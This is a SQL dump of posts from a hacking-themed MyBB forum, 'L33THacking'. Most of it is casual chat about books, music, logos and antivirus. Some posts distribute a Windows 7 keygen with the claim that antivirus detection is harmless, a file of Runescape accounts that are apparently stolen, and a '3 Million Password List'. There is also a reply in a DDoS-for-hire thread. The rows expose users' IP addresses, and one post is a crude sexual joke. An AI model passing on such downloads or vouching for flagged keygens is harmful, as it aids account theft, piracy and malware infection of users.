MyBB and Vbulletin.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8cdfcada187c038ca769d8cc08a13998', '0', '0'); INSERT INTO mybb_posts VALUES('2312', '441', '2305', '61', 'RE: Adf.ly Bot + Adfoc.us Bot', '0', '1', 't3h jok3r', '1347985874', '[quote=\'iTzIpod\' pid=\'2305\' dateline=\'1347968599\']\r\nWhy in the world did you do that??? :/\r\n[/quote]\r\n\r\nI thought it was infected and instead of having the thread permanently junked I removed the link for further discussions.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7ddabe4a126597bc1af8a527d2128c5d', '0', '0'); INSERT INTO mybb_posts VALUES('2313', '409', '2311', '30', 'RE: [Full] Forum Poster 3.30', '0', '82', 'iTzIpod', '1347996942', '[quote=\'t3h jok3r\' pid=\'2311\' dateline=\'1347984756\']\r\nThis bot supports the outdated versions of MyBB and Vbulletin.\r\n[/quote]\r\n\r\nYou tried it?\r\n\r\nYeah. Sorry about that.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd2ff51a198202b8595c8354b1c5315f2', '0', '0'); INSERT INTO mybb_posts VALUES('2315', '474', '2287', '25', 'RE: What antivirus you have?', '0', '67', 'HoverCatz', '1348004061', 'Microsoft Security Essentials (The best free)', '178.74.56.137', '-1303758711', '1', '0', '67', '1348004072', '1', '84caadff1b99bf56bd6c86c13b65d91a', '0', '1348004072'); INSERT INTO mybb_posts VALUES('2316', '409', '2313', '30', 'RE: [Full] Forum Poster 3.30', '0', '1', 't3h jok3r', '1348011311', '[quote=\'iTzIpod\' pid=\'2313\' dateline=\'1347996942\']\r\n[quote=\'t3h jok3r\' pid=\'2311\' dateline=\'1347984756\']\r\nThis bot supports the outdated versions of MyBB and Vbulletin.\r\n[/quote]\r\n\r\nYou tried it?\r\n\r\nYeah. Sorry about that.\r\n[/quote]\r\n\r\nNo but the versions you have listed are of outdated versions.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fcd20448b901f14a8cbee3843d6d941c', '0', '0'); INSERT INTO mybb_posts VALUES('2317', '472', '2221', '7', 'RE: School story', '0', '1', 't3h jok3r', '1348011484', 'Lmao I bet that your teacher will check this site out some day.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a278cbc27f40f20be81d093e5621fd4c', '0', '0'); INSERT INTO mybb_posts VALUES('2318', '475', '0', '7', '500 posts', '0', '1', 't3h jok3r', '1348011635', 'I finally got 500 posts. Its a huge milestone for me.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '70c117325bab210eeefd26ae48d48ce6', '0', '0'); INSERT INTO mybb_posts VALUES('2319', '409', '2316', '30', 'RE: [Full] Forum Poster 3.30', '0', '82', 'iTzIpod', '1348011785', '[quote=\'t3h jok3r\' pid=\'2316\' dateline=\'1348011311\']\r\n[quote=\'iTzIpod\' pid=\'2313\' dateline=\'1347996942\']\r\n[quote=\'t3h jok3r\' pid=\'2311\' dateline=\'1347984756\']\r\nThis bot supports the outdated versions of MyBB and Vbulletin.\r\n[/quote]\r\n\r\nYou tried it?\r\n\r\nYeah. Sorry about that.\r\n[/quote]\r\n\r\nNo but the versions you have listed are of outdated versions.\r\n[/quote]\r\n\r\nI don\'t got the latest version right now..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bf3cb8b2cfbb897b1692c8e651f54085', '0', '0'); INSERT INTO mybb_posts VALUES('2320', '472', '2317', '7', 'RE: School story', '0', '82', 'iTzIpod', '1348011827', '[quote=\'t3h jok3r\' pid=\'2317\' dateline=\'1348011484\']\r\nLmao I bet that your teacher will check this site out some day.\r\n[/quote]\r\n\r\nRandom Story:\r\n\r\n\r\nOne typical day, a new member has registered under NXK\'s Referral Link.\r\nIt was a member named \"Teacher\"\r\nThe teacher notices that NXK lied to him/her and then calls the police the next day..\r\n\r\nNXK = In Jail.\r\n\r\n\r\nJokes.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '047796f75fafb6c73125d9107ad76ec3', '0', '0'); INSERT INTO mybb_posts VALUES('2321', '475', '2318', '7', 'RE: 500 posts', '0', '82', 'iTzIpod', '1348011918', 'Congratulations on 500 posts my friend.\n\nAll posts were HQ. <3\n\nTime to go for 1000. ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2cf24f8d0b5c1afca33aa68df9b6aef1', '0', '0'); INSERT INTO mybb_posts VALUES('2322', '476', '0', '19', '[Junk][Junk][Announcement] t3h jok3r might be inactive', '0', '82', 'iTzIpod', '1348015750', 'I received a PM from t3h jok3r.\r\nOur Staff/Mods have received this PM too.\r\nThe PM said:\r\n\r\n[quote=\'t3h jok3r\']\r\n[b]Recently my PC broke down so I wont be able to log on long because I will log on my sisters PC. I\'m not sure by when I will get my new laptop but I\'m sure it will be around a week.[/b]\r\n\r\nPlease try to keep LH active and please search for spam and take immediate action. \r\n[/quote]\r\n\r\nIf you look at the bolded text, t3h jok3r clearly stated that he might be inactive for a week. And this is because his PC recently broke down. So he will get a new laptop somewhere around next week. \r\n\r\n\r\nOur Staff and Mods will be moderating the forum until then.\r\n\r\n\r\n- iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9ab766e235a3deb8ebbcfb9697033ef3', '0', '0'); INSERT INTO mybb_posts VALUES('2323', '476', '2322', '19', '[Junk][Announcement] t3h jok3r might be inactive', '0', '1', 't3h jok3r', '1348018008', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('2324', '476', '2322', '19', '[Junk][Junk][Announcement] t3h jok3r might be inactive', '0', '1', 't3h jok3r', '1348018009', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('2325', '477', '0', '19', '[Junk]Jok3r is going..', '0', '1', 't3h jok3r', '1348018219', 'I\'m going on a school trip somewhere tomorrow and I won\'t be on much, I would be on hardly a hour. I will come back around Monday, hopefully when I come back everything\'s in one peace :D\r\n\r\nPlease stay active and LH staff (Including mods) will be taking care of LH. There is no one in-charge.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fc7c878a6249126df8c33fdb29c471e6', '0', '0'); INSERT INTO mybb_posts VALUES('2333', '472', '2221', '7', 'RE: School story', '0', '2', 'Apathy', '1348025044', 'Not bad young padiwan. But after she checks your caught. :3', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', 'a88fbaafc5838ffbd7583f76b2bbd083', '0', '0'); INSERT INTO mybb_posts VALUES('2327', '171', '2303', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1348020185', '[quote=\'R?????zo?\' pid=\'2303\' dateline=\'1347957841\']\r\nrock, pop,dubstep, house, some trance and techno\r\nI used to listen rap before though.\r\n[/quote]\r\n\r\nI love Techno & Dubstep. <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2cf35f2a07db4e787d5588229fe37ff1', '0', '0'); INSERT INTO mybb_posts VALUES('2328', '478', '0', '7', 'The Hunger Games', '0', '82', 'iTzIpod', '1348020369', 'I just bought the Trilogy (The Hunger Games, The Hunger Games Catching Fire, & The Hunger Games MockingJay)\r\nThis is my first time reading the book. Never saw the movie before.\r\nA lot of people rated it 10/10.\r\n\r\nI\'m only on page 7 :( Anyways.\r\n\r\nI\'m reading THG. And I like it so far. Intro is kinda funny when Gale calls Katniss, Catnip. <3 Made me LOL.\r\n\r\n\r\nHave you ever read THG? If so, how was it?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ad82b39352101743c6f1cb9301e24811', '0', '0'); INSERT INTO mybb_posts VALUES('2329', '479', '0', '49', '[Suggestion] Forum Logo resized', '0', '82', 'iTzIpod', '1348022509', 'In my opinion, I think that the current forum logo (Reloadzor\'s) is kind of too big. And so I was thinking, maybe you guys should probably resize it down.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bb3425653a7a758171780ac8e825ced4', '0', '0'); INSERT INTO mybb_posts VALUES('2330', '479', '2329', '49', 'RE: [Suggestion] Forum Logo resized', '0', '1', 't3h jok3r', '1348023685', 'I agree with you but I plan on centering the logo. I\'m trying to check it out how it looks after it gets centered.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5188bac57ddf173a25789d3a271caf8e', '0', '0'); INSERT INTO mybb_posts VALUES('2331', '475', '2318', '7', 'RE: 500 posts', '0', '1', 't3h jok3r', '1348023834', 'Thanks and yeah that\'s my next milestone.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c921827b7d2ca8a792585678ea729959', '0', '0'); INSERT INTO mybb_posts VALUES('2332', '472', '2320', '7', 'RE: School story', '0', '1', 't3h jok3r', '1348023872', '[quote=\'iTzIpod\' pid=\'2320\' dateline=\'1348011827\']\r\n[quote=\'t3h jok3r\' pid=\'2317\' dateline=\'1348011484\']\r\nLmao I bet that your teacher will check this site out some day.\r\n[/quote]\r\n\r\nRandom Story:\r\n\r\n\r\nOne typical day, a new member has registered under NXK\'s Referral Link.\r\nIt was a member named \"Teacher\"\r\nThe teacher notices that NXK lied to him/her and then calls the police the next day..\r\n\r\nNXK = In Jail.\r\n\r\n\r\nJokes.\r\n[/quote]\r\n\r\nLOL but he can\'t go to jail over this.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b09f1842351bf41fd0d02bf7a4c3f428', '0', '0'); INSERT INTO mybb_posts VALUES('2334', '480', '0', '15', 'Windows 7 anytime upgrader keygen', '0', '2', 'Apathy', '1348025423', '[img]http://img525.imageshack.us/img525/5010/capturepvb.jpg[/img]\r\n\r\n“No disks, no delays – and no leaving the house. With Windows Anytime Upgrade, you can upgrade to a more advanced edition of Windows 7 – say from Home Premium to Ultimate – in as little as 10 minutes. That way, you get to take advantage of extra features while keeping your current programs, files, and settings intact.\r\n\r\nIn the past, upgrading Windows could be a bit of a hassle. In Windows 7, the software you need comes pre-installed or you can buy an upgrade key online or from an authorized retail store. Now it’s in your hands to upgrade it yourself!\r\n\r\nLINK RE-UPLOADED AGAIN. THANK YOU.\r\n\r\nFor upgrading for example Windows 7 Home Premium you have to go to:\r\nStart–> in search bar enter anytime —>start anytime prog —> start cdkey generator—>generate cdkey —> enter CD-Key —> SUCCESS!\r\n\r\nhttp://www.rarefile.net/m5rv1tcxk78v/Win7.Anytime.rar.html\r\n\r\n.\r\nits going to be detected as a virus because its a keygen but its safe.\r\n\r\nenjoy:)!!\r\n\r\n\r\nNot tested by me use at your own risk. Reports are it works though.', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', '7e7957567b806e8fbe4b833a838f330c', '0', '0'); INSERT INTO mybb_posts VALUES('2335', '479', '2329', '49', 'RE: [Suggestion] Forum Logo resized', '0', '62', 'R?????zo?', '1348037938', 'I can resize it since I got the original PSD.\nJust need to know how you want it :P', '72.13.81.226', '1208832482', '1', '0', '62', '1348037997', '1', '5291236987577df66435274fec9bf2fa', '0', '1348037997'); INSERT INTO mybb_posts VALUES('2336', '474', '2287', '25', 'RE: What antivirus you have?', '0', '62', 'R?????zo?', '1348038146', 'ESET NOD32 :)\nI think it\'s the best one out there at the moment.', '72.13.81.226', '1208832482', '1', '0', '0', '0', '1', '354a733b4ec6ff4c1a35f48440227883', '0', '0'); INSERT INTO mybb_posts VALUES('2337', '474', '2287', '25', 'RE: What antivirus you have?', '0', '84', 'Thunder™', '1348043558', 'I use Kaspersky at the moment i am looking for eset nod32 keys', '111.91.75.227', '1868254179', '0', '0', '0', '0', '1', 'b4da7a9918ecb84ef2e315082e620181', '0', '0'); INSERT INTO mybb_posts VALUES('2338', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348055299', 'Hey Reloadzor, \nI was thinking, Unique\'s Userbar looks too plain.\nCan you add some effects to it? Anything that can make it look better. \nYou can make it animated or not. I just want it to look perfect. \n\nIcon: Any\nFont: Any\nText: Unique\nType: Userbar\nSize: Current dimensions.\n\n\nPlease take your time because I want something that is awesome than something that was rushed.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a0ba717a341fb78122845788b9785ec6', '0', '0'); INSERT INTO mybb_posts VALUES('2339', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '53', 'sirchamp', '1348068182', 'Proof please (Picture/Video).', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'e6fa164528c27c1ff72fcdc480b19612', '0', '0'); INSERT INTO mybb_posts VALUES('2340', '431', '2338', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348081191', '[quote=\'iTzIpod\' pid=\'2338\' dateline=\'1348055299\']\r\nHey Reloadzor, \r\nI was thinking, Unique\'s Userbar looks too plain.\r\nCan you add some effects to it? Anything that can make it look better. \r\nYou can make it animated or not. I just want it to look perfect. \r\n\r\nIcon: Any\r\nFont: Any\r\nText: Unique\r\nType: Userbar\r\nSize: Current dimensions.\r\n\r\n\r\nPlease take your time because I want something that is awesome than something that was rushed.\r\n[/quote]\r\n\r\nI will be happy to make this, I\'ve got few ideas but what I\'m not really sure is what the icon could be? do you want the same one or can you or someone give me some suggestion. To be honest that alien one is not kinda \"unique\" so we should get something else, thats my opinion but your the boss :D', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '5bb548d1f8df628983468795ff151ca7', '0', '0'); INSERT INTO mybb_posts VALUES('2341', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348082698', 'About the icon..\nI don\'t know which icon is \"Unique\" Like I picked the Alien one in the first place because it\'s Unique. Like it was different from all humans.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9ac9b7d5c163cd26224631edfde0d2e5', '0', '0'); INSERT INTO mybb_posts VALUES('2342', '481', '0', '74', 'Runescape Accounts', '0', '82', 'iTzIpod', '1348085646', 'http://www.mediafire.com/?gxl8ldxsp7adbh8\r\n:ohya:\r\nSome have 150k ish and 25k limit. \r\nMost of them work, not sure about some of them though.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bc153270a81f751782e1e709b6fe6836', '0', '0'); INSERT INTO mybb_posts VALUES('2343', '482', '0', '61', '3 Million Password List', '0', '82', 'iTzIpod', '1348085780', 'Download: [url=http://adf.ly/DJeON]Click[/url]\r\n\r\nThe file is 228MB\r\n\r\nEnjoy!', '24.212.197.164', '416597412', '1', '0', '82', '1349024219', '1', '80fc926ceed14a31698dc5cc693efcb9', '0', '1349024219'); INSERT INTO mybb_posts VALUES('2344', '483', '0', '61', '[eBook] How to succeed in Adf.ly/Adfoc.us', '0', '82', 'iTzIpod', '1348086159', '[align=center]To download:\r\nhttps://dl.dropbox.com/u/17717808/SucceedinAdFLY.pdf[/align]\r\n\r\n[align=center]Enjoy![/align]', '24.212.197.164', '416597412', '1', '0', '82', '1348089620', '1', '35c32fabcebaf0c718c0b366131a17e4', '0', '1348089620'); INSERT INTO mybb_posts VALUES('2345', '484', '0', '4', 'Slender Man here.', '0', '194', 'Slender Man', '1348093029', 'Hello, I\'m Slender Man. I saw your site on MybbTopSites and decided to join.', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '893bd31c18b9bace354045367113c6b5', '0', '0'); INSERT INTO mybb_posts VALUES('2346', '478', '2328', '7', 'RE: The Hunger Games', '0', '194', 'Slender Man', '1348093165', 'I read the book and seen the movie. I liked it. I have also read Catching Fire. Both are great books.', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '8aa6a8817852cc41d90d165abfd639de', '0', '0'); INSERT INTO mybb_posts VALUES('2347', '472', '2221', '7', 'RE: School story', '0', '194', 'Slender Man', '1348093263', 'Nice one, Some teachers are really dumb... lol', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '6f7e7982540641db7c6741fbb8d73a15', '0', '0'); INSERT INTO mybb_posts VALUES('2348', '478', '2328', '7', 'RE: The Hunger Games', '0', '2', 'Apathy', '1348095841', 'Yea not to sounds like a hipster but I read it a few years before the movie came out. aka before it became big.', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', '5feed9209be4b5e56d83f28cb04ed77d', '0', '0'); INSERT INTO mybb_posts VALUES('2349', '484', '2345', '4', 'RE: Slender Man here.', '0', '82', 'iTzIpod', '1348097292', 'Sup Slender Man.\nNice name.\nNice avatar.\nI bet we\'re gonna be great friends! :D\nEnjoy your stay.\n\nIf you have any questions or concerns, please PM Me, JakeUS, NXK, Apathy, or t3h jok3r.\n=]\n\nFeel free to add me on Skype. Skype ID: iTzIpod\n- iTzIpod', '24.212.197.164', '416597412', '1', '0', '82', '1348097488', '1', 'bf5a6d22b35b0511587a54838d6bc04a', '0', '1348097488'); INSERT INTO mybb_posts VALUES('2350', '484', '2345', '4', 'RE: Slender Man here.', '0', '2', 'Apathy', '1348097448', 'Welcome to the forums man. Stay active and enjoy.', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', '26f65110b07fc4e2aff057497d6dd46b', '0', '0'); INSERT INTO mybb_posts VALUES('2351', '478', '2328', '7', 'RE: The Hunger Games', '0', '82', 'iTzIpod', '1348097453', 'LOL Apathy. :p\nI wish I was you. And then I can brag about how everyone is jealous that I was one of the first people to read THG.\n@Slender Man, did you read THG MockingJay?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c40349f0aac1079ac6ddea50a4e1933d', '0', '0'); INSERT INTO mybb_posts VALUES('2352', '485', '0', '19', '[Junk][?] Switching Userbars?', '0', '82', 'iTzIpod', '1348104186', 'Hey Unique.\r\n\r\nI was thinking about our current Userbar for Unique. \r\nIs it good?\r\nIs it bad?\r\nIs it too plain?\r\nEtc.\r\n\r\nAnd so I have been thinking about switching them with something else.\r\nI really don\'t know what the Icon should be. But I really dig sexy userbars :3\r\nAnimated ones are sexy too. \r\nIf you\'d like, you can try out for this. If you make something good, and I like it, you will be rewarded..\r\n\r\nReward is ??\r\n\r\nBest of Luck.\r\nAnd thanks.\r\n\r\n- iTzIpod', '24.212.197.164', '416597412', '1', '0', '82', '1348106361', '1', 'cd60822f9c75bab522de2e43f74c71be', '0', '1348106361'); INSERT INTO mybb_posts VALUES('2353', '486', '0', '56', 'Guess how many?', '0', '82', 'iTzIpod', '1348105597', '[align=center][IMG]https://sphotos-b.xx.fbcdn.net/hphotos-snc6/183770_462978410402277_2058134205_n.jpg[/IMG][/align]\n\n[align=center]How many squares are in the pic above?\n\n\n\n[Spoiler=] Answers\nAnswer - 40\n[img]http://www.allproudamericans.com/how-many-boxes-can-you-count-in-this-picture-answer.gif[/img]\n[/spoiler][/align]', '24.212.197.164', '416597412', '1', '0', '82', '1348105753', '1', '6361945d53840b8f8f7a5b7ea5ec4f76', '0', '1348105753'); INSERT INTO mybb_posts VALUES('2354', '487', '0', '56', 'Corrupt a wish', '0', '82', 'iTzIpod', '1348105845', 'The forum game is called \"Corrupt a Wish\" and is played by each poster responding to the previous posters wish in a creative way that somehow crushes the wish, makes it greatly less effective, or brings about other bad consequences for having the wish granted. After granting the wish and telling of the details each poster should then post their wish for the next person. The wishes don\'t have to be anything seriously desirable and can really be anything. Be creative in your response.\r\n\r\nFor example:\r\nWish - \"I wish I had a million dollars\r\nResponse - \"Granted but too bad that high inflation hits and that million dollars can only afford you a hamburger\"\r\n\r\nTo get things started:\r\n\r\nI wish I was famous.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '037365e28a2d590e46691b350912f075', '0', '0'); INSERT INTO mybb_posts VALUES('2355', '488', '0', '8', 'What are you listening to?', '0', '82', 'iTzIpod', '1348106004', 'Just post whatever you are listening to. You could find some great artists this way. ;)\r\n\r\nI\'m listening to PSY - Gangnam Style :3\r\n\r\nHow about you?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e5723059ba61cdeb05987c7849c9ac88', '0', '0'); INSERT INTO mybb_posts VALUES('2356', '489', '0', '8', 'What are your favorite lyrics?', '0', '82', 'iTzIpod', '1348106137', 'Lyrics are a powerful way to transmit emotions. What are some of you favorite lyrics?\r\n\r\nAll of the lyrics in the song \'Mr. Simple\' by Super Junior are lovely. They can make me feel great on the saddest day on planet Earth. My favorite part is when Heechul sings \'Grades can be good or bad, thats just how it is. Performances can go up or down, it happens.\', very powerful lyrics to me.\r\n\r\nThough its KPop, I really suggest you take a listen. They\'re subtitles.\r\n\r\n[video=youtube]http://www.youtube.com/watch?v=0Z9VEzMNFag[/video]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd34f1f75e2b95b98527dae69f0b8c26b', '0', '0'); INSERT INTO mybb_posts VALUES('2357', '479', '2329', '49', 'RE: [Suggestion] Forum Logo resized', '0', '1', 't3h jok3r', '1348106145', 'Cool, I will let you know. The text looks perfect to me but I can be wrong, I think the icon needs to be smaller.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8a7d7c475bbb6fb1d22f92f8cb82a545', '0', '0'); INSERT INTO mybb_posts VALUES('2358', '479', '2357', '49', 'RE: [Suggestion] Forum Logo resized', '0', '82', 'iTzIpod', '1348106321', '[quote=\'t3h jok3r\' pid=\'2357\' dateline=\'1348106145\']\r\nCool, I will let you know. The text looks perfect to me but I can be wrong, I think the icon needs to be smaller.\r\n[/quote]\r\n\r\nIn my opinion, I think it\'s the text size and logo/icon size..\r\nJust shrink it by a little and that\'s it. Because on my Mobile, the tabs are all pushed to the right making it overlap each other. (Tabs = Home, Upgrade, Search, Member List, Help, Contact)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '96455fbacd2f31a4423d61e5442ed3ff', '0', '0'); INSERT INTO mybb_posts VALUES('2359', '487', '2354', '56', 'RE: Corrupt a wish', '0', '1', 't3h jok3r', '1348106347', 'Too sad because then you would have more hates than lovers. \n\nI wish educational shows like prison break never end.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6c5c72cf1a8e84a139027bcf793c8629', '0', '0'); INSERT INTO mybb_posts VALUES('2360', '485', '2352', '19', 'RE: [Announcement] Switching Userbars?', '0', '1', 't3h jok3r', '1348106391', 'It would be better if you post your new userbar so people can tell if they find the new one better or not.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'eb33bcbea6649797a955440a9ccd39df', '0', '0'); INSERT INTO mybb_posts VALUES('2361', '462', '2181', '35', 'RE: Vote for LHs new logo', '0', '82', 'iTzIpod', '1348106437', '/Request Close Thread. Logo has been chosen. Thanks Reloadzor for an awesome logo. Your GFX never depresses me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c268abb10428e7bfcdd50e435578114f', '0', '0'); INSERT INTO mybb_posts VALUES('2362', '472', '2347', '7', 'RE: School story', '0', '1', 't3h jok3r', '1348106480', '[quote=\'Slender Man\' pid=\'2347\' dateline=\'1348093263\']\r\nNice one, Some teachers are really dumb... lol\r\n[/quote]\r\n\r\nLol one of my teachers said that only professional companies can buy .com domains.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '17bec3083f4cd5a8cfa613af1d2a296b', '0', '0'); INSERT INTO mybb_posts VALUES('2363', '484', '2345', '4', 'RE: Slender Man here.', '0', '1', 't3h jok3r', '1348106538', 'Welcome to L33THacking Slender Man.\n\nIf you have any questions feel free to contact any Staff member. Hope you like L33THacking', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a03adee4c33a775337823d6148742868', '0', '0'); INSERT INTO mybb_posts VALUES('2364', '390', '2141', '35', 'RE: Which Photoshop version do you use?', '0', '82', 'iTzIpod', '1348106560', '[quote=\'MistaCode\' pid=\'2141\' dateline=\'1347811593\']\r\nI use CS5 [b]Don\'t want to download CS6 yet[/b] :D Well CS6 has awesome features, I saw an tutorial somewhere doing Cray to womens bodies ;)\r\n[/quote]\r\n\r\nWhy don\'t you want to download it yet? O_o\r\nCS5 is good too but I don\'t see why not try CS6.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '64de2b131799f85021eef5c45e8f7d06', '0', '0'); INSERT INTO mybb_posts VALUES('2365', '472', '2362', '7', 'RE: School story', '0', '82', 'iTzIpod', '1348106640', '[quote=\'t3h jok3r\' pid=\'2362\' dateline=\'1348106480\']\r\n[quote=\'Slender Man\' pid=\'2347\' dateline=\'1348093263\']\r\nNice one, Some teachers are really dumb... lol\r\n[/quote]\r\n\r\nLol one of my teachers said that only professional companies can buy .com domains.\r\n[/quote]\r\n\r\n:roflol: Omg.. We should have a Facepalm Emote.. -.-\r\n\r\n:facepalm: :D\r\n\r\n-Insert Facepalm.jpeg here-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b5ea440cf620612e83a18135727a5f7f', '0', '0'); INSERT INTO mybb_posts VALUES('2366', '487', '2359', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348106862', '[quote=\'t3h jok3r\' pid=\'2359\' dateline=\'1348106347\']\r\nToo sad because then you would have more hates than lovers. \r\n\r\nI wish educational shows like prison break never end.\r\n[/quote]\r\n\r\nOmg. Speaking of PB, I finished the whole series (Season 1-4) today. Not everything in 1 day but I finally finished watching their last episode today. :( It was so sad. (No Spoilers) so..\r\n\r\n\r\nOT: Granted, but the characters got old and died. (I regret saying that :p)\r\nI wish that too.\r\n\r\n-----\r\nWish: I wish I was a girl for a day with big boobs and a 24/7 wet pussy ;) LOL', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '86447c07740e2bfe15cdc23dc3bb5f0b', '0', '0'); INSERT INTO mybb_posts VALUES('2367', '485', '2352', '19', 'RE: [?] Switching Userbars?', '0', '82', 'iTzIpod', '1348106911', 'No, I need someone to make me one since my Userbars and GFX Skills are trash. -.-\n\n[quote=iTzIpod]\nAnd so I have been thinking about switching them with something else.\nI really don\'t know what the Icon should be. But I really dig sexy userbars :3\nAnimated ones are sexy too. \n[b]If you\'d like, you can try out for this. If you make something good, and I like it, you will be rewarded..[/b]\n[/quote]', '24.212.197.164', '416597412', '1', '0', '82', '1348106969', '1', '936c3e0e42defcc3db4f590258dfa20f', '0', '1348106969'); INSERT INTO mybb_posts VALUES('2369', '390', '1796', '35', 'RE: Which Photoshop version do you use?', '0', '194', 'Slender Man', '1348107692', 'I use CS5 Extended Edition, or whatever you call it. I rarely use it though. I\'m not very good with it.', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', 'e678f763194629fc44a293218852b743', '0', '0'); INSERT INTO mybb_posts VALUES('2370', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '1', 't3h jok3r', '1348107751', 'I could a quick question, can I move this thread to the graphics section so that non-unique members could also request? Leaving discussion on OP and I will personally move this thread if the OP agrees.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9fc1221f5da8feccb4dbac35167c2896', '0', '0'); INSERT INTO mybb_posts VALUES('2371', '485', '2352', '19', 'RE: [?] Switching Userbars?', '0', '1', 't3h jok3r', '1348107784', 'Uhh ok. Then I guess we have to wait because I don\'t have my PC with me so don\'t have PS.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f50db6c65e8df26647d778abfa26b635', '0', '0'); INSERT INTO mybb_posts VALUES('2372', '390', '2369', '35', 'RE: Which Photoshop version do you use?', '0', '82', 'iTzIpod', '1348107951', '[quote=\'Slender Man\' pid=\'2369\' dateline=\'1348107692\']\r\nI use CS5 Extended Edition, or whatever you call it. I rarely use it though. I\'m not very good with it.\r\n[/quote]\r\n\r\nYou can learn. It\'s really fun and easy to use Photoshop. I learned it in a couple minutes. - Just the basics. I just looked at 1 Youtube Video and basically learned how to use Photoshop instantly :p This was like during the summer or something. \r\n\r\nOr I can probably teach you :3\r\n\r\nIt\'s ok if you\'re not very good with it. My GFX Skills may be good compared to a noob, but when it\'s compared to a pro, then it sucks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '66909c091b273d6d59e7a810e2bda791', '0', '0'); INSERT INTO mybb_posts VALUES('2373', '485', '2352', '19', 'RE: [?] Switching Userbars?', '0', '82', 'iTzIpod', '1348108038', 'I made a request in Reloadzor\'s thread. He\'s interested. Hopefully it\'s better than our current userbar.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1eda85b4634f570fa4bd58af33602533', '0', '0'); INSERT INTO mybb_posts VALUES('2374', '431', '2370', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348108190', '[quote=\'t3h jok3r\' pid=\'2370\' dateline=\'1348107751\']\r\nI could a quick question, can I move this thread to the graphics section so that non-unique members could also request? Leaving discussion on OP and I will personally move this thread if the OP agrees.\r\n[/quote]\r\n\r\n\r\nHe\'s gonna have to change his thread title & thread description. Also, he\'s gonna be getting loads of requests probably.. He did state he was busy.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e7ee41617d9b731859f568494e4d82c1', '0', '0'); INSERT INTO mybb_posts VALUES('2375', '487', '2354', '56', 'RE: Corrupt a wish', '0', '194', 'Slender Man', '1348108217', 'Too bad, she has saggy boobs and is a man. XD \n\nI wish I was President :D', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', 'c32ccc7e9e1c5b61fcafc0c9366497e5', '0', '0'); INSERT INTO mybb_posts VALUES('2376', '462', '2181', '35', 'RE: Vote for LHs new logo', '0', '194', 'Slender Man', '1348108388', 'I voted for number one, It think it looks good.', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '862a7996e7acc33f4ab2b0bc3e4e32a9', '0', '0'); INSERT INTO mybb_posts VALUES('2377', '489', '2356', '8', 'RE: What are your favorite lyrics?', '0', '194', 'Slender Man', '1348108828', 'I would say my favorite lyrics are from a song called Photograph by Nickelback. Brings back memories. Here are some lyrics: \n\nRemember the old arcade?\nBlew every dollar that we ever made\nThe cops hated us hanging out\nThey said somebody went and burned it down\n\nWe used to listen to the radio\nAnd sing along with every 